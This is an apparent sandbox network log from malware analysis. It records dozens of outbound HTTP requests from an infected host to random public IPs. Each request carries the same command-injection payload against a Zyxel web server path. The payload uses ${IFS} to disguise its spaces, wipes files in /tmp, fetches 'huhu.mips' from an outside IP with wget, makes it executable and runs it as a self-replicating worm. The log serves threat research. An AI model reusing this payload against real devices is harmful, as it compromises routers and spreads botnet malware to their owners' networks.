                                      Jan 19, 2024 17:29:17.462142944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      659192.168.2.144734667.173.114.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462179899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      660192.168.2.145646665.242.85.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462224960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      661192.168.2.1460708189.129.33.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462248087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      662192.168.2.1453538212.149.63.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462284088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      663192.168.2.144851672.91.8.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462330103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      664192.168.2.1440286185.223.203.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462364912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      665192.168.2.144933883.205.199.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462399960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      666192.168.2.1446052173.254.230.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462445021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      667192.168.2.144915494.168.29.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462467909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      668192.168.2.143834042.213.14.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462510109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      669192.168.2.1437768133.136.185.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462546110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      670192.168.2.1437878132.4.33.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462584019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      671192.168.2.1437338137.150.194.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462627888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      672192.168.2.1444386154.245.236.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462665081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      673192.168.2.1449398177.215.65.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462687016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      674192.168.2.1449954113.133.227.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462735891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      675192.168.2.1444522223.216.171.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462791920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      676192.168.2.1448934164.126.94.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462841988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      677192.168.2.143380445.205.207.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462891102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      678192.168.2.1455524128.104.240.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462904930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      679192.168.2.145311695.136.215.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462980986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      680192.168.2.144971081.77.177.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462981939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      681192.168.2.144422098.63.254.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463011980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      682192.168.2.145389479.127.212.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463042974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      683192.168.2.1443894128.165.77.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463093042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      684192.168.2.145493657.197.58.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463129044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      685192.168.2.145141486.147.127.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463160038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      686192.168.2.145522824.120.96.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463184118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      687192.168.2.143996289.136.152.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463234901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      688192.168.2.144848492.176.60.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463273048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      689192.168.2.1460074199.90.18.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463309050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      690192.168.2.143971085.196.86.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463356018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      691192.168.2.145179490.26.127.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463371992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      692192.168.2.1439318197.122.26.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463414907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      693192.168.2.145781266.180.152.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463459969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      694192.168.2.1438626183.209.175.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463510036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      695192.168.2.144776688.167.158.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463553905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      696192.168.2.145411639.205.149.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463576078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      697192.168.2.1459014134.162.31.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463603020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      698192.168.2.1436256103.96.29.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463656902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      699192.168.2.1448956163.66.139.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463692904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      700192.168.2.145278850.131.58.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463749886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      701192.168.2.145594227.212.51.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463781118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      702192.168.2.1438298192.61.89.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463826895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      703192.168.2.1447006173.53.38.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463872910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      704192.168.2.1454750204.195.82.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463929892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      705192.168.2.1449448145.114.104.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.463958979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      706192.168.2.1440770112.187.3.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464000940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      707192.168.2.1433504161.197.57.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464006901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      708192.168.2.14420104.62.86.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464071989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      709192.168.2.1458230159.46.108.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464109898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      710192.168.2.1452766222.28.178.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464134932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      711192.168.2.1448104210.30.230.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464184999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      712192.168.2.1451434112.162.242.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464230061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      713192.168.2.144847020.39.129.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464267969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      714192.168.2.1453460102.19.140.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464308023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      715192.168.2.1450902176.23.206.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464363098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      716192.168.2.143887234.120.239.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464368105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      717192.168.2.1446478123.181.214.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464415073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      718192.168.2.1433900190.179.202.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464931011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      719192.168.2.1445118106.124.2.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.464982986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      720192.168.2.145467871.109.68.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465001106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      721192.168.2.1438800150.233.113.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.465045929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      722192.168.2.145646017.101.218.32443
                                      TimestampBytes transferredDirectionData
